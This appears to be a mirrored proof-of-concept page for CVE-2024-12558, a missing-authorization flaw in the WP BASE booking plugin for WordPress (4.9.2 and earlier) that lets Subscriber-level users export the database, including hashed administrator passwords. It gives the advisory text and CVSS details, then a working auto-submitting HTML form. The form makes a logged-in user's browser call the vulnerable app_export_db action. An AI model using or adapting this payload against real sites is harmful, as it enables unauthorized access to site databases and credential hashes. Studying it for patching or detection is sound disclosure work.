CVE-2024-12558 PoC — WordPress plugin WP BASE Booking of Appointments, Services and Events 安全漏洞

Source

Associated Vulnerability

Description

WP BASE Booking of Appointments, Services and Events <= 4.9.2 - Missing Authorization to Authenticated (Subscriber+) Sensitive Information Exposure via app_export_db

Readme

# CVE-2024-12558
WP BASE Booking of Appointments, Services and Events <= 4.9.2 - Missing Authorization to Authenticated (Subscriber+) Sensitive Information Exposure via app_export_db

# Description

The WP BASE Booking of Appointments, Services and Events plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_db function in all versions up to, and including, 4.9.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to expose sensitive information from the database, such as the hashed administrator password.

## Details

- **Type**: plugin
- **Slug**: wp-base-booking-of-appointments-services-and-events
- **Affected Version**: 4.9.2
- **CVSS Score**: 6.5
- **CVSS Rating**: Medium
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
- **CVE**: CVE-2024-12558
- **Status**: Active

POC
---
```
<html>
  <body>
    <form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php?action=app_export_db" method="POST">
      <input type="hidden" name="action" value="app&#95;export&#95;db" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```

File Snapshot

 [4.0K]  /data/pocs/3630f7981df881f61568b4b6934f15f863aa1cd3
└── [1.3K]  README.md

0 directories, 1 file

Remarks